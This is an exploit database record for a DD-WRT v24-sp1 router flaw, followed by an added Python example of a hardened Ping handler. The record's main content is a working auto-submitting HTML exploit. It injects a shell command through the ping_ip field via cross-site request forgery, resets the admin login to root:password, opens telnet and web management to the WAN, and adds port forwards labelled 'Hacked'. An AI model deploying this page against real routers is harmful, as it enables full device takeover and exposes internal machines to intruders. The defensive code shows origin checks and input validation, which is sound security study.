Vendor: DD-WRT v24-sp1 (07/27/08) micro
By: Michael Brooks
CVSS: 7.5 (HIGH)
Title: Remote root command execution
CWE: 78
Product Name: DD-WRT v24-sp1 (07/27/08) micro
Affected Version From: DD-WRT v24-sp1 (07/27/08) micro
Affected Version To: DD-WRT v24-sp1 (07/27/08) micro
Patch Exists: YES
Related CWE: N/A
CPE: h:dd-wrt:dd-wrt_v24-sp1_07/27/08_micro
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Year: 2008

Remote root dd-wrt

This exploit allows remote root command execution, changing the web administration password and enabling remote administration, and creating new port forwarding rules to bypass NAT.

Mitigation:

Ensure that the DD-WRT router is running the latest version of the firmware and that all security patches are up to date.

Exploit-DB raw data:

Remote root dd-wrt
--------------------------------------------------------------------------------

Written by Michael Brooks
Special thanks to str0ke

Exploits tested on the newest stable version:
Firmware: DD-WRT v24-sp1 (07/27/08) micro
Product Homepage:
http://dd-wrt.com/

Impact:
1) Remote root command execution /bin/sh
2) Change web administration password and enable remote administration
3) Create new Port Forwarding rules to bypass NAT.

<html>
	<head>
		<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
	</head>
	Remote root command execution /bin/sh
	<form method="post" action="http://192.168.1.1/apply.cgi" id=1>
		<input name="submit_button" value="Ping" type="hidden">
		<input name="action" value="ApplyTake" type="hidden">
		<input name="submit_type" value="start" type="hidden">
		<input name="change_action" value="gozila_cgi" type="hidden">
		<input name="next_page" value="Diagnostics.asp" type="hidden">
		<input name="ping_ip" value="echo owned">
		<input name="execute command" type="submit">
	</form><br><br>	
	enable remote administration and change login to root:password
	<form method="post" action="http://192.168.1.1/apply.cgi">
		<input name="submit_button" value="Management" type="hidden">
		<input name="action" value="ApplyTake" type="hidden">
		<input name="change_action" value="" type="hidden">
		<input name="submit_type" value="" type="hidden">
		<input name="commit" value="1" type="hidden">
		<input name="PasswdModify" value="0" type="hidden">
		<input name="remote_mgt_https" value="" type="hidden">
		<input name="http_enable" value="1" type="hidden">
		<input name="info_passwd" value="0" type="hidden">
		<input name="https_enable" value="" type="hidden">
		<input name="http_username" value="root" type="hidden">
		<input name="http_passwd" value="password" type="hidden">
		<input name="http_passwdConfirm" value="password" type="hidden">
		<input name="_http_enable" value="1" type="hidden">
		<input name="refresh_time" value="3" type="hidden">
		<input name="status_auth" value="1" type="hidden">
		<input name="maskmac" value="1" type="hidden">
		<input name="remote_management" value="1" type="hidden">
		<input name="http_wanport" value="8080" type="hidden">
		<input name="remote_mgt_telnet" value="1" type="hidden">
		<input name="telnet_wanport" value="23" type="hidden">
		<input name="boot_wait" value="on" type="hidden">
		<input name="cron_enable" value="1" type="hidden">
		<input name="cron_jobs" value="" type="hidden">
		<input name="loopback_enable" value="1" type="hidden">
		<input name="nas_enable" value="1" type="hidden">
		<input name="resetbutton_enable" value="1" type="hidden">
		<input name="zebra_enable" value="1" type="hidden">
		<input name="ip_conntrack_max" value="512" type="hidden">
		<input name="ip_conntrack_tcp_timeouts" value="3600" type="hidden">
		<input name="ip_conntrack_udp_timeouts" value="120" type="hidden">
		<input name="overclocking" value="200" type="hidden">
		<input name="router_style" value="yellow" type="hidden">
		<input name="Remote Admin" type="submit">
	</form><br><br>
	Change Port Forwarding to bypass NAT protection.
	<form method="post" action="http://192.168.1.1/apply.cgi">	
		<input name="submit_button" value="Change Port Forwarding" type="submit">
		<input name="action" value="ApplyTake" type="hidden">
		<input name="change_action" value="" type="hidden">
		<input name="submit_type" value="" type="hidden">
		<input name="forward_spec" value="13" type="hidden">
		<input name="name0" value="Hacked" type="hidden">
		<input name="from0" value="4450" type="hidden">
		<input name="pro0" value="both" type="hidden">
		<input name="ip0" value="192.168.1.100" type="hidden">
		<input name="to0" value="445" type="hidden">
		<input name="enable0" value="on" type="hidden">
		<input name="name1" value="Hacked Again" type="hidden">
		<input name="from1" value="22" type="hidden">
		<input name="pro1" value="tcp" type="hidden">
		<input name="ip1" value="192.168.1.101" type="hidden">
		<input name="to1" value="22" type="hidden">
		<input name="enable1" value="on" type="hidden">
	</form>
</html>
<script>
	document.getElementById(1).submit();//remote root command execution!
</script>

# milw0rm.com [2008-12-08]
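The first form in the exploit above succeeds for two independent reasons: apply.cgi accepts a form post from any web page a LAN user happens to visit, and it hands the ping_ip field to /bin/sh unmodified, so "echo owned" runs as root. The Python below is an editor's example added to this record; it is not part of the original exploit and not DD-WRT's code. It models a hardened handler for the Ping action with the two checks a defender would want: a request-origin check (Origin header, Referer as fallback) and strict validation of ping_ip as an IP literal or RFC 1123 hostname, after which ping is invoked as an argv list so no shell ever parses the input. The router origin list, the function names and the argv shape are assumptions; the sample requests are constructed from the form fields on this page.

```python
import ipaddress
import re
import subprocess
from urllib.parse import urlparse

# Assumption: the router's own web origin(s). A real firmware would derive this
# from its configured LAN address rather than hard-code it.
ROUTER_ORIGINS = {"http://192.168.1.1", "https://192.168.1.1"}

# RFC 1123-style hostname: labels of letters, digits and hyphens, no leading or
# trailing hyphen, 253 characters max. Nothing a shell treats specially can pass.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def validate_ping_target(value):
    """Return the ping target as a canonical IP literal or hostname, or None if rejected.

    The exploit's payload 'echo owned' fails both checks, as does anything with
    spaces, ';', '|', backticks or a leading '-' (which ping could read as an option).
    """
    value = value.strip()
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    if HOSTNAME_RE.match(value):
        return value
    return None


def origin_allowed(headers):
    """Accept a form post only if the browser says it came from the router's own UI.

    Origin is preferred; Referer is the fallback for older browsers. A request
    carrying neither is treated as cross-site, because an auto-submitted form on
    an attacker's page is exactly the request that looks like this.
    """
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parsed = urlparse(referer)
        origin = f"{parsed.scheme}://{parsed.netloc}"
    return origin in ROUTER_ORIGINS


def build_ping_argv(target, count=3):
    """Build the ping command as an argv list so no shell ever parses the input."""
    checked = validate_ping_target(target)
    if checked is None:
        return None
    return ["ping", "-c", str(count), checked]


def run_ping(argv):
    """Execute the validated argv directly; shell=False is the point of the argv form."""
    return subprocess.run(argv, capture_output=True, text=True, timeout=30, check=False)


def handle_apply(form, headers):
    """Model of a hardened apply.cgi 'Ping' action. Returns (decision, detail)."""
    if not origin_allowed(headers):
        return ("rejected", "cross-site request: Origin/Referer is not the router's UI")
    if form.get("submit_button") != "Ping":
        return ("rejected", "unhandled submit_button")
    argv = build_ping_argv(form.get("ping_ip", ""))
    if argv is None:
        return ("rejected", "ping_ip is not an IP address or hostname")
    return ("accepted", argv)


# Constructed sample: the first form from the exploit page, as a victim's browser
# on the LAN would post it after loading the attacker's page.
CSRF_REQUEST = {
    "form": {
        "submit_button": "Ping",
        "action": "ApplyTake",
        "submit_type": "start",
        "change_action": "gozila_cgi",
        "next_page": "Diagnostics.asp",
        "ping_ip": "echo owned",
    },
    "headers": {"Referer": "http://attacker.example/index.html"},  # constructed
}

# Constructed sample: a legitimate ping request from the router's own page.
LEGIT_REQUEST = {
    "form": {"submit_button": "Ping", "ping_ip": "192.168.1.2"},
    "headers": {"Origin": "http://192.168.1.1"},
}

if __name__ == "__main__":
    for name, req in (("csrf", CSRF_REQUEST), ("legit", LEGIT_REQUEST)):
        print(name, handle_apply(req["form"], req["headers"]))
```

The two checks are deliberately independent: the origin check stops the cross-site delivery, and the target validation stops the injection even when a request arrives from the router's own origin, so neither one is the single point of failure.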